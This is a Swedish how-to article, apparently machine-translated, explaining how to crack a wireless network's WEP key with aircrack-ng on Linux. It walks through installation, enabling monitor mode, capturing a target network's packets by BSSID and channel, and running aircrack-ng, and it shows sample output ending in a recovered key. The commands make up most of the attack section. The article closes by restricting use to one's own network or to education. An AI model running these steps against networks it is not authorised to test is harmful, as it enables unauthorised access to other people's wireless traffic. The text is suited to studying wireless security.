hur man knäcker en trådlös WEP-nyckel med AIR Crack

den här artikeln beskriver kort enkla steg om hur man knäcker en trådlös WEP-nyckel med aircrack-ng-programvara. Detta kan göras genom att sniffa ett trådlöst nätverk, fånga krypterade paket och köra lämpligt krypteringssprickningsprogram i ett försök att dekryptera fångade data. WEP (Wired Equivalent Privacy) är ganska lätt att knäcka eftersom den bara använder en nyckel för att kryptera all trafik.

grundprincipen är att kommunikationen mellan två noder i nätverket är baserad på MAC-adressen. Varje värd får paket endast avsedda för MAC-adress för sitt eget gränssnitt. Samma princip gäller även för trådlösa nätverk. Men om en nod sätter sitt eget nätverkskort i promiskuöst läge kommer det också att få paket som inte adresseras för sin egen MAC-adress.

för att knäcka WEP-nyckeln måste en hacker fånga provpaket som inte är avsedda för sitt eget nätverksgränssnitt och köra crack-program för att jämföra testnycklar mot WEP-nyckel som medföljer fångade paket i försök att dekryptera. Nyckeln som passar för att dekryptera fångade paket är nyckeln som används av trådlöst nätverk för att kryptera hela sin trådlösa kommunikation med sina anslutna stationer.

i följande avsnitt guidar vi dig genom aircrack-ng-installationen på Linux och visar dig steg-för-steg-instruktionerna för att knäcka en trådlös WEP-nyckel. Guiden förutsätter att ditt trådlösa nätverkskort är installerat och att det stöder bildskärmsläge.

i denna handledning lär du dig:

  • hur man installerar aircrack-ng på stora Linux distros
  • hur man knäcker en trådlös WEP-nyckel med aircrack-ng
hur man knäcker en trådlös WEP-nyckel med aircrack-ng

hur man knäcker en trådlös WEP-nyckel med aircrack-ng

programkrav och Linux-Kommandoradskonventioner
Kategori krav, konventioner eller programvaruversion som används
System alla Linux-distributioner
programvara aircrack-ng
Övrigt privilegierad åtkomst till ditt Linux-system som root eller via kommandot sudo.
konventioner # – kräver att givna linux-kommandon körs med root-privilegier antingen direkt som root-användare eller med hjälp av sudo kommando
$ – kräver att givna linux-kommandon körs som en vanlig icke-privilegierad användare

installera aircrack-ng på stora Linux-distributioner

för att komma igång behöver du aircrack-ng-programvaran installerad på ditt system. Du kan använda lämpligt kommando nedan för att installera programmet med systemets pakethanterare.

för att installera aircrack – ng På Ubuntu, Debian och Linux Mint:

$ sudo apt install aircrack-ng

för att installera aircrack-ng på CentOS, Fedora, AlmaLinux och Red Hat:

$ sudo dnf install aircrack-ng

för att installera aircrack – ng på Arch Linux och Manjaro:

$ sudo pacman -S aircrack-ng

Crack wireless WEP key

  1. först måste vi identifiera namnet på vårt trådlösa nätverksgränssnitt. Om ditt trådlösa nätverkskort är korrekt installerat kommer ett iwconfig – kommando att avslöja namnet på ditt trådlösa nätverksgränssnitt:
    $ iwconfigwlan0 IEEE 802.11 Mode:Monitor Frequency:2.437 GHz Tx-Power=20 dBm

    utgången visar att i vårt fall är gränssnittsnamnet wlan0.

  2. slå sedan på monitorläge för det trådlösa gränssnittet.
    # airmon-ng start wlan0Interface Chipset Driverwlan0 rtl8180 - (monitor mode enabled on mon0)

    resultatet av kommandot ger dig namnet på det nya virtuella gränssnittet. Det tenderar att vara mon0.

  3. dumpa resultaten från bildskärmen i en terminal så att du kan se dem.
    # airodump-ng mon0

    du kan se en tabell med data som rör trådlösa nätverk i ditt område. Du behöver bara information om det nätverk du vill knäcka. Leta efter det och notera BSSID och kanalen som den är på.

  4. därefter kommer du att logga resultaten av en skanning till en fil. Den fångstloggen kommer att behövas av Aircrack för att köra en brute force attack på nätverket senare. För att få din fångst kommer du att köra samma kommando som tidigare, men du anger din BSSID, kanal och loggplatsen.
    # airodump-ng -c 1 --bssid XX:XX:XX:XX:XX:XX -w Documents/logs/wep-crack mon0

    fyll i din faktiska information innan du kör kommandot och låt det springa.

  5. som ett sista steg vi knäcka WEP nyckel med hjälp av fångade paket och aircrack-ng kommando. Alla fångade paket lagras nu i wep-crack-01.cap fil.
    # aircrack-ng -z wep-crack-01.cap

    din produktion ska se ut så här:

    Opening wep-crack-01.capRead 450 packets. # BSSID ESSID Encryption 1 00:11:95:9F:FD:F4 linuxconfig.org WEP (210 IVs) 2 00:17:3F:65:2E:5A belkin54g None (0.0.0.0)Index number of target network ?1 Aircrack-ng 1.0 rc1 Tested 485 keys (got 16690 IVs) KB depth byte(vote) 0 9/ 13 00(20992) 06(20736) 27(20736) 3F(20736) A2(20736) 1 0/ 1 F3(28416) A8(23296) 34(21248) 57(21248) A3(21248) 2 0/ 2 8E(25856) BC(23808) 3F(23040) D2(22784) 69(21504) 3 0/ 5 6E(24320) 35(22528) 5A(22016) 95(22016) B8(22016) 4 3/ 4 98(21504) 7C(20992) 84(20992) E0(20992) F0(20992) KEY FOUND! Decrypted correctly: 100%
aircrack-ng försöker knäcka WEP-tangenten på Linux

aircrack-ng försöker knäcka WEP-tangenten på Linux

avslutande tankar

i den här guiden såg vi hur man installerar aircrack-ng på Linux och använder programvaran för att knäcka en trådlös WEP-nyckel. Kom ihåg att denna process endast ska användas för att testa din egen säkerhet eller för utbildningsändamål. Att använda det på någon annans nätverk är olagligt.

Lämna ett svar

Lämna ett svar

Din e-postadress kommer inte publiceras.